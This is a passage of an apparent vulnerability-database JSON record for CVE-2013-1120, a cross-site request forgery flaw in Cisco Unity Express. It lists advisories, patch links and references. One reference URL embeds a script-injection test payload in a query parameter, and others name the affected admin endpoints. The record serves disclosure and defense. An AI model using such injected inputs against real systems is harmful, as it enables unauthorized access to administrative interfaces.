NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n", "sources": [ { "db": "NVD", "id": "CVE-2013-1120" }, { "db": "JVNDB", "id": "JVNDB-2013-001443" }, { "db": "BID", "id": "57678" }, { "db": "VULHUB", "id": "VHN-61122" }, { "db": "PACKETSTORM", "id": "120068" }, { "db": "PACKETSTORM", "id": "120043" } ], "trust": 2.16 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-61122", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-61122" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2013-1120", "trust": 3.0 }, { "db": "JVNDB", "id": "JVNDB-2013-001443", "trust": 0.8 }, { "db": "SECUNIA", "id": "52045", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201302-081", "trust": 0.7 }, { "db": "CISCO", "id": "20130201 CISCO UNITY EXPRESS CROSS SITE REQUEST FORGERY VULNERABILITIES", "trust": 0.6 }, { "db": "BID", "id": "57678", "trust": 0.4 }, { "db": "PACKETSTORM", "id": "120068", "trust": 0.2 }, { "db": "EXPLOIT-DB", "id": "24449", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-61122", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "120043", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-61122" }, { "db": "BID", "id": "57678" }, { "db": "JVNDB", "id": "JVNDB-2013-001443" }, { "db": "PACKETSTORM", "id": "120068" }, { "db": "PACKETSTORM", "id": "120043" }, { "db": "CNNVD", "id": "CNNVD-201302-081" }, { "db": "NVD", "id": "CVE-2013-1120" } ] }, "id": "VAR-201302-0172", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-61122" } ], "trust": 0.01 }, "last_update_date": "2024-11-23T22:31:28.253000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Cisco Unity Express Cross Site Request Forgery Vulnerabilities", "trust": 0.8, "url": "http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1120" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-001443" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-352", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-61122" }, { "db": "JVNDB", "id": "JVNDB-2013-001443" }, { "db": "NVD", "id": "CVE-2013-1120" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.9, "url": "http://tools.cisco.com/security/center/content/ciscosecuritynotice/cve-2013-1120" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1120" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-1120" }, { "trust": 0.6, "url": "http://secunia.com/advisories/52045" }, { "trust": 0.3, "url": "http://www.cisco.com/en/us/products/sw/voicesw/ps5520/index.html" }, { "trust": 0.2, "url": "http://tools.cisco.com/security/center/content/ciscosecuritynotice/cve-2013-1114" }, { "trust": 0.1, "url": "http://x.x.x.x/web/sa3/addholiday.do" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1114" }, { "trust": 0.1, "url": "http://infosec42.blogspot.com/2013/02/cisco-unity-express-vulnerabilites.html" }, { "trust": 0.1, "url": "http://x.x.x.x/web/sa/saveconfiguration.do\"" }, { "trust": 0.1, "url": "http://x.x.x.x/web/sa2/scriptlist.do?gui_pagenotabledata=\u003e\u003cscript\u003ealert(42)\u003c/script\u003e" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1120" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=28045" }, { "trust": 0.1, "url": "http://secunia.com/advisories/52045/" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=28044" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_intelligence/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/secunia_security_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/52045/#comments" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/personal/" }, { "trust": 0.1, "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org" }, { "trust": 0.1, "url": "http://secunia.com/blog/325/" }, { "trust": 0.1, "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52045" }, { "trust": 0.1, "url": "http://secunia.com/advisories/about_secunia_advisories/" } ], "sources": [ { "db": "VULHUB", "id": "VHN-61122" }, { "db": "BID", "id": "57678" }, { "db": "JVNDB", "id": "JVNDB-2013-001443" }, { "db": "PACKETSTORM", "id": "120068" }, { "db": "PACKETSTORM", "id": "120043" }, { "db": "CNNVD", "id": "CNNVD-201302-081" }, { "db": "NVD", "id": "CVE-2013-1120" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-61122" }, { "db": "BID", "id": "57678" }, { "db": "JVNDB", "id": "JVNDB-2013-001443" }, { "db": "PACKETSTORM", "id": "120068" }, { "db": "PACKETSTORM", "id": "120043" }, { "db": "CNNVD", "id": "CNNVD-201302-081" }, { "db": "NVD", "id": "CVE-2013-1120" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-02-06T00:00:00", "db": "VULHUB", "id": "VHN-61122" }, { "date": "2013-02-01T00:00:00", "db": "BID", "id": "57678" }, { "date": "2013-02-07T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-001443" }, { "date": "2013-02-05T23:20:12", "db": "PACKETSTORM", "id": "120068" }, { "date": "2013-02-04T06:43:21", "db": "PACKETSTORM", "id": "120043" }, { "date": "2013-02-07T00:00:00", "db": "CNNVD", "id": "CNNVD-201302-081" }, { "date": "2013-02-06T12:05:43.833000", "db": "NVD", "id": "CVE-2013-1120" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-02-07T00:00:00", "db": "VULHUB", "id": "VHN-61122" }, { "date": "2013-02-01T00:00:00", "db": "BID", "id": "57678" }, { "date": "2013-02-18T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-001443" }, { "date": "2013-02-07T00:00:00", "db": "CNNVD", "id": "CNNVD-201302-081" }, { "date": "2024-11-21T01:48:56.690000", "db": "NVD", "id": "CVE-2013-1120" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201302-081" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Cisco Unity Express Vulnerable to cross-site request forgery", "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-001443" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "cross-site request forgery", "sources": [ { "db": "CNNVD", "id": "CNNVD-201302-081" } ], "trust": 0.6 } }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.